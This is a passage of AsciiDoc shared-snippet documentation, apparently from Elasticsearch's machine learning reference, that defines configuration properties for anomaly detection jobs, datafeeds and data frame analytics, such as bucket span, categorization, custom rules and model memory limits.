{dfanalytics} you want to perform on your source index. For -example: `outlier_detection`. See <>. -end::analysis[] - -tag::analysis-config[] -The analysis configuration, which specifies how to analyze the data. After you -create a job, you cannot change the analysis configuration; all the properties -are informational. -end::analysis-config[] - -tag::analysis-limits[] -Limits can be applied for the resources required to hold the mathematical models -in memory. These limits are approximate and can be set per job. They do not -control the memory used by other processes, for example the {es} Java processes. -end::analysis-limits[] - -tag::assignment-explanation-anomaly-jobs[] -For open {anomaly-jobs} only, contains messages relating to the selection -of a node to run the job. -end::assignment-explanation-anomaly-jobs[] - -tag::assignment-explanation-datafeeds[] -For started {dfeeds} only, contains messages relating to the selection of a -node. -end::assignment-explanation-datafeeds[] - -tag::assignment-explanation-dfanalytics[] -Contains messages relating to the selection of a node. -end::assignment-explanation-dfanalytics[] - -tag::background-persist-interval[] -Advanced configuration option. The time between each periodic persistence of the -model. The default value is a randomized value between 3 to 4 hours, which -avoids all jobs persisting at exactly the same time. The smallest allowed value -is 1 hour. -+ --- -TIP: For very large models (several GB), persistence could take 10-20 minutes, -so do not set the `background_persist_interval` value too low. - --- -end::background-persist-interval[] - -tag::bucket-allocation-failures-count[] -The number of buckets for which new entities in incoming data were not processed -due to insufficient model memory. This situation is also signified by a -`hard_limit: memory_status` property value. -end::bucket-allocation-failures-count[] - -tag::bucket-count[] -The number of buckets processed. 
-end::bucket-count[] - -tag::bucket-count-anomaly-jobs[] -The number of bucket results produced by the job. -end::bucket-count-anomaly-jobs[] - -tag::bucket-span[] -The size of the interval that the analysis is aggregated into, typically between -`5m` and `1h`. The default value is `5m`. If the {anomaly-job} uses a {dfeed} -with {ml-docs}/ml-configuring-aggregation.html[aggregations], this value must be -divisible by the interval of the date histogram aggregation. For more -information, see {ml-docs}/ml-buckets.html[Buckets]. -end::bucket-span[] - -tag::bucket-span-results[] -The length of the bucket in seconds. This value matches the `bucket_span` -that is specified in the job. -end::bucket-span-results[] - -tag::bucket-time-exponential-average[] -Exponential moving average of all bucket processing times, in milliseconds. -end::bucket-time-exponential-average[] - -tag::bucket-time-exponential-average-hour[] -Exponentially-weighted moving average of bucket processing times -calculated in a 1 hour time window, in milliseconds. -end::bucket-time-exponential-average-hour[] - -tag::bucket-time-maximum[] -Maximum among all bucket processing times, in milliseconds. -end::bucket-time-maximum[] - -tag::bucket-time-minimum[] -Minimum among all bucket processing times, in milliseconds. -end::bucket-time-minimum[] - -tag::bucket-time-total[] -Sum of all bucket processing times, in milliseconds. -end::bucket-time-total[] - -tag::by-field-name[] -The field used to split the data. In particular, this property is used for -analyzing the splits with respect to their own history. It is used for finding -unusual values in the context of the split. -end::by-field-name[] - -tag::calendar-id[] -A string that uniquely identifies a calendar. -end::calendar-id[] - -tag::categorization-analyzer[] -If `categorization_field_name` is specified, you can also define the analyzer -that is used to interpret the categorization field. This property cannot be used -at the same time as `categorization_filters`. The categorization analyzer -specifies how the categorization field is interpreted by the categorization -process. The syntax is very similar to that used to define the `analyzer` in the -<>. For more information, see -{ml-docs}/ml-configuring-categories.html[Categorizing log messages]. -+ -The `categorization_analyzer` field can be specified either as a string or as an -object. If it is a string it must refer to a -<> or one added by another plugin. If it -is an object it has the following properties: -+ -.Properties of `categorization_analyzer` -[%collapsible%open] -===== -`char_filter`:::: -(array of strings or objects) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=char-filter] - -`tokenizer`:::: -(string or object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=tokenizer] - -`filter`:::: -(array of strings or objects) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=filter] -===== -end::categorization-analyzer[] - -tag::categorization-examples-limit[] -The maximum number of examples stored per category in memory and in the results -data store. The default value is `4`. If you increase this value, more examples -are available, however it requires that you have more storage available. If you -set this value to `0`, no examples are stored. -+ -NOTE: The `categorization_examples_limit` only applies to analysis that uses -categorization. For more information, see -{ml-docs}/ml-configuring-categories.html[Categorizing log messages]. 
-end::categorization-examples-limit[] - -tag::categorization-field-name[] -If this property is specified, the values of the specified field will be -categorized. The resulting categories must be used in a detector by setting -`by_field_name`, `over_field_name`, or `partition_field_name` to the keyword -`mlcategory`. For more information, see -{ml-docs}/ml-configuring-categories.html[Categorizing log messages]. -end::categorization-field-name[] - -tag::categorization-filters[] -If `categorization_field_name` is specified, you can also define optional -filters. This property expects an array of regular expressions. The expressions -are used to filter out matching sequences from the categorization field values. -You can use this functionality to fine tune the categorization by excluding -sequences from consideration when categories are defined. For example, you can -exclude SQL statements that appear in your log files. For more information, see -{ml-docs}/ml-configuring-categories.html[Categorizing log messages]. This -property cannot be used at the same time as `categorization_analyzer`. If you -only want to define simple regular expression filters that are applied prior to -tokenization, setting this property is the easiest method. If you also want to -customize the tokenizer or post-tokenization filtering, use the -`categorization_analyzer` property instead and include the filters as -`pattern_replace` character filters. The effect is exactly the same. -end::categorization-filters[] - -tag::categorization-status[] -The status of categorization for the job. Contains one of the following values: -+ --- -* `ok`: Categorization is performing acceptably well (or not being used at all). -* `warn`: Categorization is detecting a distribution of categories that suggests -the input data is inappropriate for categorization. Problems could be that there -is only one category, more than 90% of categories are rare, the number of -categories is greater than 50% of the number of categorized documents, there are -no frequently matched categories, or more than 50% of categories are dead. - --- -end::categorization-status[] - -tag::categorized-doc-count[] -The number of documents that have had a field categorized. -end::categorized-doc-count[] - -tag::char-filter[] -One or more <>. In addition to the -built-in character filters, other plugins can provide more character filters. -This property is optional. If it is not specified, no character filters are -applied prior to categorization. If you are customizing some other aspect of the -analyzer and you need to achieve the equivalent of `categorization_filters` -(which are not permitted when some other aspect of the analyzer is customized), -add them here as -<>. -end::char-filter[] - -tag::chunking-config[] -{dfeeds-cap} might be required to search over long time periods, for several -months or years. This search is split into time chunks in order to ensure the -load on {es} is managed. Chunking configuration controls how the size of these -time chunks are calculated and is an advanced configuration option. -+ -.Properties of `chunking_config` -[%collapsible%open] -==== -`mode`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=mode] - -`time_span`::: -(<>) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=time-span] -==== -end::chunking-config[] - -tag::class-assignment-objective[] -Defines the objective to optimize when assigning class labels: -`maximize_accuracy` or `maximize_minimum_recall`. 
When maximizing accuracy, -class labels are chosen to maximize the number of correct predictions. When -maximizing minimum recall, labels are chosen to maximize the minimum recall -for any class. Defaults to `maximize_minimum_recall`. -end::class-assignment-objective[] - -tag::compute-feature-influence[] -Specifies whether the feature influence calculation is enabled. Defaults to -`true`. -end::compute-feature-influence[] - -tag::custom-preprocessor[] -(Optional, Boolean) -Boolean value indicating if the analytics job created the preprocessor -or if a user provided it. This adjusts the feature importance calculation. -When `true`, the feature importance calculation returns importance for the -processed feature. When `false`, the total importance of the original field -is returned. Default is `false`. -end::custom-preprocessor[] - -tag::custom-rules[] -An array of custom rule objects, which enable you to customize the way detectors -operate. For example, a rule may dictate to the detector conditions under which -results should be skipped. For more examples, see -{ml-docs}/ml-configuring-detector-custom-rules.html[Customizing detectors with custom rules]. -end::custom-rules[] - -tag::custom-rules-actions[] -The set of actions to be triggered when the rule applies. If -more than one action is specified the effects of all actions are combined. The -available actions include: - -* `skip_result`: The result will not be created. This is the default value. -Unless you also specify `skip_model_update`, the model will be updated as usual -with the corresponding series value. -* `skip_model_update`: The value for that series will not be used to update the -model. Unless you also specify `skip_result`, the results will be created as -usual. This action is suitable when certain values are expected to be -consistently anomalous and they affect the model in a way that negatively -impacts the rest of the results. -end::custom-rules-actions[] - -tag::custom-rules-scope[] -An optional scope of series where the rule applies. A rule must either -have a non-empty scope or at least one condition. By default, the scope includes -all series. Scoping is allowed for any of the fields that are also specified in -`by_field_name`, `over_field_name`, or `partition_field_name`. To add a scope -for a field, add the field name as a key in the scope object and set its value -to an object with the following properties: -end::custom-rules-scope[] - -tag::custom-rules-scope-filter-id[] -The id of the filter to be used. -end::custom-rules-scope-filter-id[] - -tag::custom-rules-scope-filter-type[] -Either `include` (the rule applies for values in the filter) or `exclude` (the -rule applies for values not in the filter). Defaults to `include`. -end::custom-rules-scope-filter-type[] - -tag::custom-rules-conditions[] -An optional array of numeric conditions when the rule applies. A rule must -either have a non-empty scope or at least one condition. Multiple conditions are -combined together with a logical `AND`. A condition has the following -properties: -end::custom-rules-conditions[] - -tag::custom-rules-conditions-applies-to[] -Specifies the result property to which the condition applies. The available -options are `actual`, `typical`, `diff_from_typical`, `time`. If your detector -uses `lat_long`, `metric`, `rare`, or `freq_rare` functions, you can only -specify conditions that apply to `time`. -end::custom-rules-conditions-applies-to[] - -tag::custom-rules-conditions-operator[] -Specifies the condition operator. 
The available options are `gt` (greater than), -`gte` (greater than or equals), `lt` (less than) and `lte` (less than or -equals). -end::custom-rules-conditions-operator[] - -tag::custom-rules-conditions-value[] -The value that is compared against the `applies_to` field using the `operator`. -end::custom-rules-conditions-value[] - -tag::custom-settings[] -Advanced configuration option. Contains custom meta data about the job. For -example, it can contain custom URL information as shown in -{ml-docs}/ml-configuring-url.html[Adding custom URLs to {ml} results]. -end::custom-settings[] - -tag::daily-model-snapshot-retention-after-days[] -Advanced configuration option, which affects the automatic removal of old model -snapshots for this job. It specifies a period of time (in days) after which only -the first snapshot per day is retained. This period is relative to the timestamp -of the most recent snapshot for this job. Valid values range from `0` to -`model_snapshot_retention_days`. For new jobs, the default value is `1`. For -jobs created before version 7.8.0, the default value matches -`model_snapshot_retention_days`. For more information, refer to -{ml-docs}/ml-model-snapshots.html[Model snapshots]. -end::daily-model-snapshot-retention-after-days[] - -tag::data-description[] -The data description defines the format of the input data when you send data to -the job by using the <> API. Note that when configure -a {dfeed}, these properties are automatically set. When data is received via -the <> API, it is not stored in {es}. Only the results -for {anomaly-detect} are retained. -+ -.Properties of `data_description` -[%collapsible%open] -==== -`format`::: - (string) Only `JSON` format is supported at this time. - -`time_field`::: - (string) The name of the field that contains the timestamp. - The default value is `time`. - -`time_format`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=time-format] -==== -end::data-description[] - -tag::datafeed-id[] -A numerical character string that uniquely identifies the -{dfeed}. This identifier can contain lowercase alphanumeric characters (a-z -and 0-9), hyphens, and underscores. It must start and end with alphanumeric -characters. -end::datafeed-id[] - -tag::datafeed-id-wildcard[] -Identifier for the {dfeed}. It can be a {dfeed} identifier or a wildcard -expression. -end::datafeed-id-wildcard[] - -tag::dead-category-count[] -The number of categories created by categorization that will never be assigned -again because another category's definition makes it a superset of the dead -category. (Dead categories are a side effect of the way categorization has no -prior training.) -end::dead-category-count[] - -tag::delayed-data-check-config[] -Specifies whether the {dfeed} checks for missing data and the size of the -window. For example: `{"enabled": true, "check_window": "1h"}`. -+ -The {dfeed} can optionally search over indices that have already been read in -an effort to determine whether any data has subsequently been added to the -index. If missing data is found, it is a good indication that the `query_delay` -option is set too low and the data is being indexed after the {dfeed} has passed -that moment in time. See -{ml-docs}/ml-delayed-data-detection.html[Working with delayed data]. -+ -This check runs only on real-time {dfeeds}. -+ -.Properties of `delayed_data_check_config` -[%collapsible%open] -==== -`check_window`:: -(<>) The window of time that is searched for late data. -This window of time ends with the latest finalized bucket. 
It defaults to -`null`, which causes an appropriate `check_window` to be calculated when the -real-time {dfeed} runs. In particular, the default `check_window` span -calculation is based on the maximum of `2h` or `8 * bucket_span`. - -`enabled`:: -(Boolean) Specifies whether the {dfeed} periodically checks for delayed data. -Defaults to `true`. -==== -end::delayed-data-check-config[] - -tag::dependent-variable[] -Defines which field of the document is to be predicted. -This parameter is supplied by field name and must match one of the fields in -the index being used to train. If this field is missing from a document, then -that document will not be used for training, but a prediction with the trained -model will be generated for it. It is also known as continuous target variable. -end::dependent-variable[] - -tag::desc-results[] -If true, the results are sorted in descending order. -end::desc-results[] - -tag::description-dfa[] -A description of the job. -end::description-dfa[] - -tag::dest[] -The destination configuration, consisting of `index` and optionally -`results_field` (`ml` by default). -+ -.Properties of `dest` -[%collapsible%open] -==== -`index`::: -(Required, string) Defines the _destination index_ to store the results of the -{dfanalytics-job}. - -`results_field`::: -(Optional, string) Defines the name of the field in which to store the results -of the analysis. Defaults to `ml`. -==== -end::dest[] - -tag::detector-description[] -A description of the detector. For example, `Low event rate`. -end::detector-description[] - -tag::detector-field-name[] -The field that the detector uses in the function. If you use an event rate -function such as `count` or `rare`, do not specify this field. -+ --- -NOTE: The `field_name` cannot contain double quotes or backslashes. - --- -end::detector-field-name[] - -tag::detector-index[] -A unique identifier for the detector. This identifier is based on the order of -the detectors in the `analysis_config`, starting at zero. -end::detector-index[] - -tag::dfas-alpha[] -Regularization factor to penalize deeper trees when training decision trees. -end::dfas-alpha[] - -tag::dfas-downsample-factor[] -The value of the downsample factor. -end::dfas-downsample-factor[] - -tag::dfas-eta-growth[] -Specifies the rate at which the `eta` increases for each new tree that is added to the -forest. For example, a rate of `1.05` increases `eta` by 5%. -end::dfas-eta-growth[] - -tag::dfas-feature-processors[] -A collection of feature preprocessors that modify one or more included fields. -The analysis uses the resulting one or more features instead of the -original document field. Multiple `feature_processors` entries can refer to the -same document fields. -Note, automatic categorical {ml-docs}/ml-feature-encoding.html[feature encoding] -still occurs. -end::dfas-feature-processors[] - -tag::dfas-feature-processors-feat-name[] -The resulting feature name. -end::dfas-feature-processors-feat-name[] - -tag::dfas-feature-processors-field[] -The name of the field to encode. -end::dfas-feature-processors-field[] - -tag::dfas-feature-processors-frequency[] -The configuration information necessary to perform frequency encoding. -end::dfas-feature-processors-frequency[] - -tag::dfas-feature-processors-frequency-map[] -The resulting frequency map for the field value. If the field value is missing -from the `frequency_map`, the resulting value is `0`. 
-end::dfas-feature-processors-frequency-map[] - -tag::dfas-feature-processors-ngram[] -The configuration information necessary to perform ngram encoding. Features -written out by this encoder have the following name format: -`.`. For example, if the -`feature_prefix` is `f`, the feature name for the second unigram in a string is -`f.11`. -end::dfas-feature-processors-ngram[] - -tag::dfas-feature-processors-ngram-feat-pref[] -The feature name prefix. Defaults to `ngram__`. -end::dfas-feature-processors-ngram-feat-pref[] - -tag::dfas-feature-processors-ngram-field[] -The name of the text field to encode. -end::dfas-feature-processors-ngram-field[] - -tag::dfas-feature-processors-ngram-length[] -Specifies the length of the ngram substring. Defaults to `50`. Must be greater -than `0`. -end::dfas-feature-processors-ngram-length[] - -tag::dfas-feature-processors-ngram-ngrams[] -Specifies which ngrams to gather. It’s an array of integer values where the -minimum value is 1, and a maximum value is 5. -end::dfas-feature-processors-ngram-ngrams[] - -tag::dfas-feature-processors-ngram-start[] -Specifies the zero-indexed start of the ngram substring. Negative values are -allowed for encoding ngram of string suffixes. Defaults to `0`. -end::dfas-feature-processors-ngram-start[] - -tag::dfas-feature-processors-one-hot[] -The configuration information necessary to perform one hot encoding. -end::dfas-feature-processors-one-hot[] - -tag::dfas-feature-processors-one-hot-map[] -The one hot map mapping the field value with the column name. -end::dfas-feature-processors-one-hot-map[] - -tag::dfas-feature-processors-target-mean[] -The configuration information necessary to perform target mean encoding. -end::dfas-feature-processors-target-mean[] - -tag::dfas-feature-processors-target-mean-default[] -The default value if field value is not found in the `target_map`. -end::dfas-feature-processors-target-mean-default[] - -tag::dfas-feature-processors-target-mean-map[] -The field value to target mean transition map. -end::dfas-feature-processors-target-mean-map[] - -tag::dfas-iteration[] -The number of iterations on the analysis. -end::dfas-iteration[] - -tag::dfas-max-attempts[] -If the algorithm fails to determine a non-trivial tree (more than a single -leaf), this parameter determines how many of such consecutive failures are -tolerated. Once the number of attempts exceeds the threshold, the forest -training stops. -end::dfas-max-attempts[] - -tag::dfas-max-optimization-rounds[] -A multiplier responsible for determining the maximum number of -hyperparameter optimization steps in the Bayesian optimization procedure. -The maximum number of steps is determined based on the number of undefined hyperparameters -times the maximum optimization rounds per hyperparameter. -end::dfas-max-optimization-rounds[] - -tag::dfas-num-folds[] -The maximum number of folds for the cross-validation procedure. -end::dfas-num-folds[] - -tag::dfas-num-splits[] -Determines the maximum number of splits for every feature that can occur in a -decision tree when the tree is trained. -end::dfas-num-splits[] - -tag::dfas-soft-limit[] -Tree depth limit is used for calculating the tree depth penalty. This is a soft -limit, it can be exceeded. -end::dfas-soft-limit[] - -tag::dfas-soft-tolerance[] -Tree depth tolerance is used for calculating the tree depth penalty. This is a -soft limit, it can be exceeded. -end::dfas-soft-tolerance[] - -tag::dfas-timestamp[] -The timestamp when the statistics were reported in milliseconds since the epoch. 
-end::dfas-timestamp[] - -tag::dfas-timing-stats[] -An object containing time statistics about the {dfanalytics-job}. -end::dfas-timing-stats[] - -tag::dfas-timing-stats-elapsed[] -Runtime of the analysis in milliseconds. -end::dfas-timing-stats-elapsed[] - -tag::dfas-timing-stats-iteration[] -Runtime of the latest iteration of the analysis in milliseconds. -end::dfas-timing-stats-iteration[] - -tag::dfas-validation-loss[] -An object containing information about validation loss. -end::dfas-validation-loss[] - -tag::dfas-validation-loss-fold[] -Validation loss values for every added decision tree during the forest growing -procedure. -end::dfas-validation-loss-fold[] - -tag::dfas-validation-loss-type[] -The type of the loss metric. For example, `binomial_logistic`. -end::dfas-validation-loss-type[] - -tag::earliest-record-timestamp[] -The timestamp of the earliest chronologically input document. -end::earliest-record-timestamp[] - -tag::empty-bucket-count[] -The number of buckets which did not contain any data. If your data -contains many empty buckets, consider increasing your `bucket_span` or using -functions that are tolerant to gaps in data such as `mean`, `non_null_sum` or -`non_zero_count`. -end::empty-bucket-count[] - -tag::eta[] -Advanced configuration option. The shrinkage applied to the weights. Smaller -values result in larger forests which have a better generalization error. -However, the smaller the value the longer the training will take. For more -information about shrinkage, see -{wikipedia}/Gradient_boosting#Shrinkage[this wiki article]. By -default, this value is calculated during hyperparameter optimization. -end::eta[] - -tag::exclude-frequent[] -Contains one of the following values: `all`, `none`, `by`, or `over`. If set, -frequent entities are excluded from influencing the anomaly results. Entities -can be considered frequent over time or frequent in a population. If you are -working with both over and by fields, then you can set `exclude_frequent` to -`all` for both fields, or to `by` or `over` for those specific fields. -end::exclude-frequent[] - -tag::exclude-interim-results[] -If `true`, the output excludes interim results. By default, interim results are -included. -end::exclude-interim-results[] - -tag::failed-category-count[] -The number of times that categorization wanted to create a new category but -couldn't because the job had hit its `model_memory_limit`. This count does not -track which specific categories failed to be created. Therefore you cannot use -this value to determine the number of unique categories that were missed. -end::failed-category-count[] - -tag::feature-bag-fraction[] -Advanced configuration option. Defines the fraction of features that will be -used when selecting a random bag for each candidate split. By default, this -value is calculated during hyperparameter optimization. -end::feature-bag-fraction[] - -tag::feature-influence-threshold[] -The minimum {olscore} that a document needs to have to calculate its feature -influence score. Value range: 0-1 (`0.1` by default). -end::feature-influence-threshold[] - -tag::filter[] -One or more <>. In addition to the built-in -token filters, other plugins can provide more token filters. This property is -optional. If it is not specified, no token filters are applied prior to -categorization. -end::filter[] - -tag::filter-id[] -A string that uniquely identifies a filter. -end::filter-id[] - -tag::forecast-total[] -The number of individual forecasts currently available for the job.
A value of -`1` or more indicates that forecasts exist. -end::forecast-total[] - -tag::frequency[] -The interval at which scheduled queries are made while the {dfeed} runs in real -time. The default value is either the bucket span for short bucket spans, or, -for longer bucket spans, a sensible fraction of the bucket span. For example: -`150s`. When `frequency` is shorter than the bucket span, interim results for -the last (partial) bucket are written then eventually overwritten by the full -bucket results. If the {dfeed} uses aggregations, this value must be divisible -by the interval of the date histogram aggregation. -end::frequency[] - -tag::frequent-category-count[] -The number of categories that match more than 1% of categorized documents. -end::frequent-category-count[] - -tag::from[] -Skips the specified number of {dfanalytics-jobs}. The default value is `0`. -end::from[] - -tag::from-models[] -Skips the specified number of models. The default value is `0`. -end::from-models[] - -tag::function[] -The analysis function that is used. For example, `count`, `rare`, `mean`, `min`, -`max`, and `sum`. For more information, see -{ml-docs}/ml-functions.html[Function reference]. -end::function[] - -tag::gamma[] -Advanced configuration option. Regularization parameter to prevent overfitting -on the training data set. Multiplies a linear penalty associated with the size of -individual trees in the forest. The higher the value the more training will -prefer smaller trees. The smaller this parameter the larger individual trees -will be and the longer training will take. By default, this value is calculated -during hyperparameter optimization. -end::gamma[] - -tag::groups[] -A list of job groups. A job can belong to no groups or many. -end::groups[] - -tag::indices[] -An array of index names. Wildcards are supported. For example: -`["it_ops_metrics", "server*"]`. -+ --- -NOTE: If any indices are in remote clusters then `node.remote_cluster_client` -must not be set to `false` on any {ml} nodes. - --- -end::indices[] - -tag::indices-options[] -Specifies index expansion options that are used during search. -+ --- -For example: -``` -{ - "expand_wildcards": ["all"], - "ignore_unavailable": true, - "allow_no_indices": "false", - "ignore_throttled": true -} -``` -For more information about these options, see <>. --- -end::indices-options[] - -tag::inference-config-classification-num-top-classes[] -Specifies the number of top class predictions to return. Defaults to 0. -end::inference-config-classification-num-top-classes[] - -tag::inference-config-classification-num-top-feature-importance-values[] -Specifies the maximum number of -{ml-docs}/ml-feature-importance.html[{feat-imp}] values per document. By -default, it is zero and no {feat-imp} calculation occurs. -end::inference-config-classification-num-top-feature-importance-values[] - -tag::inference-config-classification-top-classes-results-field[] -Specifies the field to which the top classes are written. Defaults to -`top_classes`. -end::inference-config-classification-top-classes-results-field[] - -tag::inference-config-classification-prediction-field-type[] -Specifies the type of the predicted field to write. -Acceptable values are: `string`, `number`, `boolean`. When `boolean` is provided -`1.0` is transformed to `true` and `0.0` to `false`. 
-end::inference-config-classification-prediction-field-type[] - -tag::inference-config-regression-num-top-feature-importance-values[] -Specifies the maximum number of -{ml-docs}/ml-feature-importance.html[{feat-imp}] values per document. -By default, it is zero and no {feat-imp} calculation occurs. -end::inference-config-regression-num-top-feature-importance-values[] - -tag::inference-config-results-field[] -The field that is added to incoming documents to contain the inference -prediction. Defaults to `predicted_value`. -end::inference-config-results-field[] - -tag::inference-config-results-field-processor[] -The field that is added to incoming documents to contain the inference -prediction. Defaults to the `results_field` value of the {dfanalytics-job} that was -used to train the model, which defaults to `_prediction`. -end::inference-config-results-field-processor[] - -tag::inference-metadata-feature-importance-feature-name[] -The feature for which this importance was calculated. -end::inference-metadata-feature-importance-feature-name[] -tag::inference-metadata-feature-importance-magnitude[] -The average magnitude of this feature across all the training data. -This value is the average of the absolute values of the importance -for this feature. -end::inference-metadata-feature-importance-magnitude[] -tag::inference-metadata-feature-importance-max[] -The maximum importance value across all the training data for this -feature. -end::inference-metadata-feature-importance-max[] -tag::inference-metadata-feature-importance-min[] -The minimum importance value across all the training data for this -feature. -end::inference-metadata-feature-importance-min[] - -tag::influencers[] -A comma separated list of influencer field names. Typically these can be the by, -over, or partition fields that are used in the detector configuration. You might -also want to use a field name that is not specifically named in a detector, but -is available as part of the input data. When you use multiple detectors, the use -of influencers is recommended as it aggregates results for each influencer -entity. -end::influencers[] - -tag::input-bytes[] -The number of bytes of input data posted to the {anomaly-job}. -end::input-bytes[] - -tag::input-field-count[] -The total number of fields in input documents posted to the {anomaly-job}. This -count includes fields that are not used in the analysis. However, be aware that -if you are using a {dfeed}, it extracts only the required fields from the -documents it retrieves before posting them to the job. -end::input-field-count[] - -tag::input-record-count[] -The number of input documents posted to the {anomaly-job}. -end::input-record-count[] - -tag::invalid-date-count[] -The number of input documents with either a missing date field or a date that -could not be parsed. -end::invalid-date-count[] - -tag::is-interim[] -If `true`, this is an interim result. In other words, the results are calculated -based on partial input data. -end::is-interim[] - -tag::job-id-anomaly-detection[] -Identifier for the {anomaly-job}. -end::job-id-anomaly-detection[] - -tag::job-id-anomaly-detection-default[] -Identifier for the {anomaly-job}. It can be a job identifier, a group name, or a -wildcard expression. If you do not specify one of these options, the API returns -information for all {anomaly-jobs}. -end::job-id-anomaly-detection-default[] - -tag::job-id-anomaly-detection-define[] -Identifier for the {anomaly-job}. 
This identifier can contain lowercase -alphanumeric characters (a-z and 0-9), hyphens, and underscores. It must start -and end with alphanumeric characters. -end::job-id-anomaly-detection-define[] - -tag::job-id-anomaly-detection-list[] -An identifier for the {anomaly-jobs}. It can be a job -identifier, a group name, or a comma-separated list of jobs or groups. -end::job-id-anomaly-detection-list[] - -tag::job-id-anomaly-detection-wildcard[] -Identifier for the {anomaly-job}. It can be a job identifier, a group name, or a -wildcard expression. -end::job-id-anomaly-detection-wildcard[] - -tag::job-id-anomaly-detection-wildcard-list[] -Identifier for the {anomaly-job}. It can be a job identifier, a group name, a -comma-separated list of jobs or groups, or a wildcard expression. -end::job-id-anomaly-detection-wildcard-list[] - -tag::job-id-data-frame-analytics[] -Identifier for the {dfanalytics-job}. -end::job-id-data-frame-analytics[] - -tag::job-id-data-frame-analytics-default[] -Identifier for the {dfanalytics-job}. If you do not specify this option, the API -returns information for the first hundred {dfanalytics-jobs}. -end::job-id-data-frame-analytics-default[] - -tag::job-id-data-frame-analytics-define[] -Identifier for the {dfanalytics-job}. This identifier can contain lowercase -alphanumeric characters (a-z and 0-9), hyphens, and underscores. It must start -and end with alphanumeric characters. -end::job-id-data-frame-analytics-define[] - -tag::job-id-datafeed[] -The unique identifier for the job to which the {dfeed} sends data. -end::job-id-datafeed[] - -tag::jobs-stats-anomaly-detection[] -An array of {anomaly-job} statistics objects. -For more information, see <>. -end::jobs-stats-anomaly-detection[] - -tag::lambda[] -Advanced configuration option. Regularization parameter to prevent overfitting -on the training data set. Multiplies an L2 regularisation term which applies to -leaf weights of the individual trees in the forest. The higher the value the -more training will attempt to keep leaf weights small. This makes the prediction -function smoother at the expense of potentially not being able to capture -relevant relationships between the features and the {depvar}. The smaller this -parameter the larger individual trees will be and the longer training will take. -By default, this value is calculated during hyperparameter optimization. -end::lambda[] - -tag::last-data-time[] -The timestamp at which data was last analyzed, according to server time. -end::last-data-time[] - -tag::latency[] -The size of the window in which to expect data that is out of time order. The -default value is 0 (no latency). If you specify a non-zero value, it must be -greater than or equal to one second. For more information about time units, see -<>. -+ --- -NOTE: Latency is only applicable when you send data by using -the <> API. - --- -end::latency[] - -tag::latest-empty-bucket-timestamp[] -The timestamp of the last bucket that did not contain any data. -end::latest-empty-bucket-timestamp[] - -tag::latest-record-timestamp[] -The timestamp of the latest chronologically input document. -end::latest-record-timestamp[] - -tag::latest-sparse-record-timestamp[] -The timestamp of the last bucket that was considered sparse. 
-end::latest-sparse-record-timestamp[] - -tag::max-empty-searches[] -If a real-time {dfeed} has never seen any data (including during any initial -training period) then it will automatically stop itself and close its associated -job after this many real-time searches that return no documents. In other words, -it will stop after `frequency` times `max_empty_searches` of real-time -operation. If not set then a {dfeed} with no end time that sees no data will -remain started until it is explicitly stopped. By default this setting is not -set. -end::max-empty-searches[] - -tag::max-trees[] -Advanced configuration option. Defines the maximum number of trees the forest is -allowed to contain. The maximum value is 2000. By default, this value is -calculated during hyperparameter optimization. -end::max-trees[] - -tag::method[] -The method that {oldetection} uses. Available methods are `lof`, `ldof`, -`distance_kth_nn`, `distance_knn`, and `ensemble`. The default value is -`ensemble`, which means that {oldetection} uses an ensemble of different methods -and normalises and combines their individual {olscores} to obtain the overall -{olscore}. -end::method[] - -tag::missing-field-count[] -The number of input documents that are missing a field that the {anomaly-job} is -configured to analyze. Input documents with missing fields are still processed -because it is possible that not all fields are missing. -+ --- -NOTE: If you are using {dfeeds} or posting data to the job in JSON format, a -high `missing_field_count` is often not an indication of data issues. It is not -necessarily a cause for concern. - --- -end::missing-field-count[] - -tag::mode[] -There are three available modes: -+ --- -* `auto`: The chunk size is dynamically calculated. This is the default and -recommended value when the {dfeed} does not use aggregations. -* `manual`: Chunking is applied according to the specified `time_span`. Use this -mode when the {dfeed} uses aggregations. -* `off`: No chunking is applied. --- -end::mode[] - -tag::model-bytes[] -The number of bytes of memory used by the models. This is the maximum value -since the last time the model was persisted. If the job is closed, this value -indicates the latest size. -end::model-bytes[] - -tag::model-bytes-exceeded[] -The number of bytes over the high limit for memory usage at the last allocation -failure. -end::model-bytes-exceeded[] - -tag::model-id[] -The unique identifier of the trained model. -end::model-id[] - -tag::model-memory-limit[] -The approximate maximum amount of memory resources that are required for -analytical processing. Once this limit is approached, data pruning becomes -more aggressive. Upon exceeding this limit, new entities are not modeled. The -default value for jobs created in version 6.1 and later is `1024mb`. -This value will need to be increased for jobs that are expected to analyze high -cardinality fields, but the default is set to a relatively small size to ensure -that high resource usage is a conscious decision. The default value for jobs -created in versions earlier than 6.1 is `4096mb`. -+ -If you specify a number instead of a string, the units are assumed to be MiB. -Specifying a string is recommended for clarity. If you specify a byte size unit -of `b` or `kb` and the number does not equate to a discrete number of megabytes, -it is rounded down to the closest MiB. The minimum valid value is 1 MiB. If you -specify a value less than 1 MiB, an error occurs. For more information about -supported byte size units, see <>. 
-+ -If your `elasticsearch.yml` file contains an `xpack.ml.max_model_memory_limit` -setting, an error occurs when you try to create jobs that have -`model_memory_limit` values greater than that setting. For more information, -see <>. -end::model-memory-limit[] - -tag::model-memory-limit-anomaly-jobs[] -The upper limit for model memory usage, checked on increasing values. -end::model-memory-limit-anomaly-jobs[] - -tag::model-memory-status[] -The status of the mathematical models, which can have one of the following -values: -+ --- -* `ok`: The models stayed below the configured value. -* `soft_limit`: The models used more than 60% of the configured memory limit -and older unused models will be pruned to free up space. Additionally, in -categorization jobs no further category examples will be stored. -* `hard_limit`: The models used more space than the configured memory limit. -As a result, not all incoming data was processed. --- -end::model-memory-status[] - -tag::model-plot-config[] -This advanced configuration option stores model information along with the -results. It provides a more detailed view into {anomaly-detect}. -+ --- -WARNING: If you enable model plot it can add considerable overhead to the -performance of the system; it is not feasible for jobs with many entities. - -Model plot provides a simplified and indicative view of the model and its -bounds. It does not display complex features such as multivariate correlations -or multimodal data. As such, anomalies may occasionally be reported which cannot -be seen in the model plot. - -Model plot config can be configured when the job is created or updated later. It -must be disabled if performance issues are experienced. --- -end::model-plot-config[] - -tag::model-plot-config-annotations-enabled[] -If true, enables calculation and storage of the model change annotations -for each entity that is being analyzed. Defaults to `enabled`. -end::model-plot-config-annotations-enabled[] - 